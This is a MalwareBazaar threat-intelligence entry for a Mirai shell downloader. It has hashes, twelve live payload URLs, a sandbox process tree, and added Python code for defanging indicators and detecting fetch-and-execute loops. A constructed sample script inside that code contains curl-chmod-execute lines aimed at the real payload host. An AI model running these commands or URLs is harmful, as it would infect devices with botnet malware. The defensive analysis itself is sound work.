MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 fa2b18cec0e94f9b4465ad67dfa6963fd587f54e4907e89693b7b10769bd1142. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry

Mirai
Vendor detections: 7


SHA256 hash: fa2b18cec0e94f9b4465ad67dfa6963fd587f54e4907e89693b7b10769bd1142
SHA3-384 hash: d062b7d4f49cf03cd86349eac016da8f3c93a1891bf308fe19d98f3d491f0769e82a13dd824cd07839ac1674f2455eb2
SHA1 hash: 1ffd9a98f1ee37306f91d08fe5360d1db21261a2
MD5 hash: e3ea9844a35fc82e155e0c617a9c485f
humanhash: wyoming-eight-tango-beryllium
File name: curl.sh
Signature: Mirai
File size: 1'079 bytes
First seen: 2025-06-16 10:59:58 UTC
Last seen: Never
File type: sh
MIME type: text/plain
ssdeep: 24:3J3McskfcslZcsQGNIxyYcszXKwcsydcsPRcsW1csyymcsrRcsQTcsdhcsWhf:qdkfdlZdYldzXBdyddPRdW1dyymdrRdr
TLSH: T13E110BBC009CB906675AAF69F161BA2AF905C8E570E589C4F22DD531C5FEA28603D21F
Magika: shell
Reporter: abuse_ch
Tags: sh
URLs associated with this sample: twelve architecture-specific ELF payloads, all served from one host and one directory. The SHA256 column identifies the ELF served at each URL, and the Tags column is MalwareBazaar's tagging of that ELF (note that the mipsel build carries no mirai tag and the sh4 build is tagged both gafgyt and mirai).

URL | Malware sample (SHA256 hash) | Signature | Tags
http://103.149.252.178/skibidi/cutearm | 1bc137841445a32184b981463f26cf92cd5faee96c6530b71788322f6e02b74c | Mirai | elf mirai ua-wget
http://103.149.252.178/skibidi/cutearm5 | 31bd74459680c387a1eb10667a44b7691101778b2eee79dd9e33c27cf18af7eb | Mirai | elf mirai ua-wget
http://103.149.252.178/skibidi/cutearm6 | e7ed00ebd7a3124bf74c3a1e5de27d55daeba1a6c6dd9b507a5c4435eb87e78c | Mirai | elf mirai ua-wget
http://103.149.252.178/skibidi/cutearm7 | b2510b90cc924b8bde71cb86f3875a466de3a4dff19efa2cc4d93173f38a3381 | Mirai | elf mirai ua-wget
http://103.149.252.178/skibidi/cutem68k | fc1848906eb6cf539a5009dfa5cbd87b822287242ceb9e04e7bd6f747a1f0a6e | Mirai | elf mirai ua-wget
http://103.149.252.178/skibidi/cutemips | 994d3872166fd7b39d2c05628c86417140f456637e811f9235792c5b667947dd | Mirai | elf mirai ua-wget
http://103.149.252.178/skibidi/cutemipsel | 88fcbf23a8273804bfb89bd72ef93c0d3d5d899a239cde333396d34184d15293 | Mirai | elf ua-wget
http://103.149.252.178/skibidi/cutepowerpc | f9d2eec0a3481cac09af0aa96723e831d4a66af87e48347fde818281d62af70e | Mirai | elf mirai ua-wget
http://103.149.252.178/skibidi/cutesh4 | 245daaf02866c349c32028beeaec0c428a85ad4a0fe3df40449ad0cdd2942db6 | Mirai | elf gafgyt mirai ua-wget
http://103.149.252.178/skibidi/cutex86 | 72f6704fdb711d1ba20c96a7ef73e7ac2cd41943cc4bdd417cab03417be1eb55 | Mirai | elf mirai ua-wget
http://103.149.252.178/skibidi/cutex86_64 | a6880d908d5fa479ce234db7beed1598d5c8e9304696d3af7dc8cfee07a55e7e | Mirai | elf mirai ua-wget
http://103.149.252.178/skibidi/cutex86_32 | d2d4f746e5138d2ec2e13b2331be588a2c09b94df979cf30fb128797c5315a64 | Mirai | elf mirai ua-wget
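To turn the table above into something you can block and share, here is an added Python example (editor's code, not MalwareBazaar's and not the malware's). It takes the twelve URLs from the table, derives the host, the serving directory and the target architecture of each payload from its file name, emits defanged indicators, and also harvests URLs from a constructed Mirai-style downloader script. That script text is an assumption about the shape of curl.sh (the page does not reproduce the sample's contents), and the architecture suffix list is the editor's, not a standard.

```python
import re
from urllib.parse import urlsplit

# The twelve payload URLs from the MalwareBazaar table above (taken from the page).
DROP_URLS = [
    "http://103.149.252.178/skibidi/cutearm",
    "http://103.149.252.178/skibidi/cutearm5",
    "http://103.149.252.178/skibidi/cutearm6",
    "http://103.149.252.178/skibidi/cutearm7",
    "http://103.149.252.178/skibidi/cutem68k",
    "http://103.149.252.178/skibidi/cutemips",
    "http://103.149.252.178/skibidi/cutemipsel",
    "http://103.149.252.178/skibidi/cutepowerpc",
    "http://103.149.252.178/skibidi/cutesh4",
    "http://103.149.252.178/skibidi/cutex86",
    "http://103.149.252.178/skibidi/cutex86_64",
    "http://103.149.252.178/skibidi/cutex86_32",
]

# Architecture suffixes commonly used in Mirai/Gafgyt payload names (assumed list,
# extend as needed). Longest first so "mipsel" beats "mips" and "x86_64" beats "x86".
ARCH_TOKENS = sorted(
    ["arm", "arm5", "arm6", "arm7", "m68k", "mips", "mipsel", "powerpc", "ppc",
     "sh4", "x86", "x86_32", "x86_64", "i586", "i686", "arc", "sparc", "spc"],
    key=len, reverse=True)

# Constructed stand-in for a Mirai-style downloader. This is an assumption about
# what curl.sh looks like; the real sample's text is not reproduced on the page.
SAMPLE_SCRIPT = """#!/bin/sh
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
curl -O http://103.149.252.178/skibidi/cutearm; chmod +x cutearm; ./cutearm
curl -O http://103.149.252.178/skibidi/cutemips; chmod +x cutemips; ./cutemips
rm -rf cute*
"""

# A URL ends at whitespace or at the shell punctuation that usually follows it.
URL_RE = re.compile(r"""https?://[\w.\-]+(?::\d+)?/[^\s;'"`)]*""")


def payload_arch(name):
    """Architecture token a payload file name ends with, or None if unknown."""
    for tok in ARCH_TOKENS:
        if name.endswith(tok):
            return tok
    return None


def defang(url):
    """Make a URL safe to paste into tickets: hxxp scheme, bracketed dots in the host."""
    scheme, rest = url.split("://", 1)
    host, _, path = rest.partition("/")
    return f"{scheme.replace('http', 'hxxp')}://{host.replace('.', '[.]')}/{path}"


def urls_in_script(text):
    """Harvest every http(s) URL from downloader script text, deduplicated."""
    return sorted(set(URL_RE.findall(text)))


def extract_iocs(urls):
    """Summarise payload URLs into hosts, directories, architectures and defanged forms."""
    hosts, payloads = set(), []
    for url in urls:
        p = urlsplit(url)
        hosts.add(f"{p.hostname}:{p.port or (443 if p.scheme == 'https' else 80)}")
        directory, _, name = p.path.rpartition("/")
        payloads.append({"url": url, "defanged": defang(url), "name": name,
                         "arch": payload_arch(name), "dir": directory + "/"})
    return {
        "hosts": sorted(hosts),
        "dirs": sorted({x["dir"] for x in payloads}),
        "archs": sorted({x["arch"] for x in payloads if x["arch"]}),
        "payloads": payloads,
    }


if __name__ == "__main__":
    report = extract_iocs(DROP_URLS)
    print("hosts:", report["hosts"], "dirs:", report["dirs"])
    print("architectures:", report["archs"])
    for x in report["payloads"]:
        print(f"{str(x['arch']):>8}  {x['defanged']}")
    print("URLs in constructed script:", urls_in_script(SAMPLE_SCRIPT))
```

The host and directory are the indicators worth blocking; individual file names rotate between campaigns, which is why the example keys on the architecture suffix rather than on the "cute" prefix.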

Intelligence

File Origin
  Uploads: 1
  Downloads: 78
  Origin country: DE

Vendor Threat Intelligence

Status: terminated
Behavior Graph (process tree recovered from the sandbox trace; the raw graph's node identifiers are omitted):

  /usr/bin/sudo (pid 1879)
  +- execve  /tmp/sample.bin (pid 1886)   <- the script under analysis, started under sudo from /tmp
     +- execve  /usr/bin/curl  [net, send-data]  x12  pids 1888, 1980, 2106, 2202, 2319, 2432, 2572, 2732, 2863, 2956, 3041, 3191
     +- execve  /usr/bin/chmod                   x12  pids 1978, 2103, 2200, 2315, 2429, 2569, 2728, 2860, 2954, 3038, 3189, 3235
     +- clone   /usr/bin/dash                    x12  pids 1979, 2105, 2201, 2317, 2431, 2571, 2730, 2861, 2955, 3040, 3190, 3236
     +- execve  /usr/bin/rm    [delete-file]     x1   pid 3237, the last event in the trace

  Ordering in the trace: curl, chmod, dash, repeated twelve times in that order, then the single rm.

  Network (all twelve curl processes, one destination):
    103.149.252.178:80  <- pid 1888: 94 B, 1980: 95 B, 2106: 95 B, 2202: 95 B, 2319: 95 B, 2432: 95 B,
                           2572: 97 B, 2732: 98 B, 2863: 94 B, 2956: 94 B, 3041: 97 B, 3191: 97 B

Twelve fetch / chmod / shell-child cycles against one host match the twelve per-architecture payload URLs in the table above: the script tries every build in turn and cleans up with a single rm at the end. The 94 to 98 byte sends are outbound HTTP requests only, and their sizes track the length of the requested file name in the URL table (7-character names such as cutearm give 94 B, 8-character names such as cutearm5 give 95 B, cutemipsel gives 97 B, cutepowerpc gives 98 B), so the graph records the requests, not what came back.
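The trace above is the signature of a multi-architecture fetch-and-execute loop, and that shape is detectable independently of the host or file names. Here is an added Python example (editor's code, not the sandbox's or MalwareBazaar's) that encodes the process and network edges from the graph as a constructed event list and runs a detection over it: any parent that repeatedly spawns a fetcher, then chmod, then a shell child is flagged, together with the destinations its children contacted and whether the run ended in rm. The minimum cycle count and the sets of fetcher and shell names are assumptions to tune for your environment.

```python
from collections import defaultdict

# Events reconstructed from the behavior graph above. This is a constructed,
# condensed encoding of that trace as (pid, ppid, image, action) tuples,
# not the sandbox's raw output format.
CURL = [1888, 1980, 2106, 2202, 2319, 2432, 2572, 2732, 2863, 2956, 3041, 3191]
CHMOD = [1978, 2103, 2200, 2315, 2429, 2569, 2728, 2860, 2954, 3038, 3189, 3235]
DASH = [1979, 2105, 2201, 2317, 2431, 2571, 2730, 2861, 2955, 3040, 3190, 3236]
SENT = [94, 95, 95, 95, 95, 95, 97, 98, 94, 94, 97, 97]   # bytes per curl, in trace order

PROC_EVENTS = [(1886, 1879, "/tmp/sample.bin", "execve")]
for c, m, d in zip(CURL, CHMOD, DASH):
    PROC_EVENTS += [(c, 1886, "/usr/bin/curl", "execve"),
                    (m, 1886, "/usr/bin/chmod", "execve"),
                    (d, 1886, "/usr/bin/dash", "clone")]
PROC_EVENTS.append((3237, 1886, "/usr/bin/rm", "execve"))
# (pid, destination, bytes sent); one flow per curl, all to the same host:port
NET_EVENTS = [(pid, "103.149.252.178:80", n) for pid, n in zip(CURL, SENT)]

# Assumed name sets; extend for your fleet (busybox applets, tftp, ftpget, ...).
FETCHERS = {"curl", "wget", "tftp", "ftpget"}
SHELLS = {"sh", "dash", "bash", "ash", "busybox"}


def fetch_exec_loops(proc_events, net_events, min_cycles=3):
    """Flag parents that repeat fetcher -> chmod -> shell child (the IoT downloader
    pattern). Returns {parent_pid: summary} for every parent reaching min_cycles."""
    children = defaultdict(list)      # ppid -> [(pid, basename, action)] in trace order
    for pid, ppid, image, action in proc_events:
        children[ppid].append((pid, image.rsplit("/", 1)[-1], action))
    net = defaultdict(list)           # pid -> [(destination, bytes)]
    for pid, dest, n in net_events:
        net[pid].append((dest, n))

    hits = {}
    for parent, kids in children.items():
        names = [name for _, name, _ in kids]
        cycles, i = 0, 0
        while i + 2 < len(names):     # count non-overlapping fetch/chmod/shell triples
            if names[i] in FETCHERS and names[i + 1] == "chmod" and names[i + 2] in SHELLS:
                cycles += 1
                i += 3
            else:
                i += 1
        if cycles < min_cycles:
            continue
        flows = [f for pid, _, _ in kids for f in net[pid]]
        hits[parent] = {
            "cycles": cycles,
            "destinations": sorted({dest for dest, _ in flows}),
            "bytes_sent": sum(n for _, n in flows),
            "ends_with_rm": names[-1] == "rm",
        }
    return hits


if __name__ == "__main__":
    for parent, summary in fetch_exec_loops(PROC_EVENTS, NET_EVENTS).items():
        print(f"pid {parent}: {summary}")
```

On the page's trace this flags pid 1886 only: the sudo parent has a single child and never reaches the threshold. The same function works over EDR or auditd process-creation events once they are mapped to the (pid, ppid, image, action) shape used here.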
Threat name: Document-HTML.Trojan.Heuristic
Status: Malicious
First seen: 2025-06-16 11:00:30 UTC
File Type: Text (Shell)
AV detection: 7 of 23 (30.43%)
Threat level: 2/5

Result
Malware family: n/a
Score: 3/10
Tags: n/a
Behaviour:
  Modifies registry class
  Suspicious use of SetWindowsHookEx
  Enumerates physical storage devices

The three behaviour lines are Windows observations (registry classes, SetWindowsHookEx) reported for a POSIX shell script; a sh file cannot perform them, so they reflect the environment it was detonated in rather than the sample. The Linux process tree above is the behaviour that matters for this entry, and the heuristic "Document-HTML" threat name should be weighted accordingly.

Please note that we are no longer able to provide a coverage score for Virus Total.

YARA Signatures


MalwareBazaar uses YARA rules from several public and non-public repositories, such as YARAhub and Malpedia. Those are being matched against malware samples uploaded to MalwareBazaar as well as against any suspicious process dumps they may create. Please note that only results from TLP:CLEAR rules are being displayed.

Rule name: RANSOMWARE
Author: ToroGuitar

The only TLP:CLEAR match is a generically named rule whose name does not agree with the Mirai signature above; treat it as a weak signal and read the rule's conditions before using it for classification.

File information


The table below shows additional information about this malware sample such as delivery method and external references.

Web download
  Mirai | sh | fa2b18cec0e94f9b4465ad67dfa6963fd587f54e4907e89693b7b10769bd1142 (this sample)

Delivery method: Distributed via web download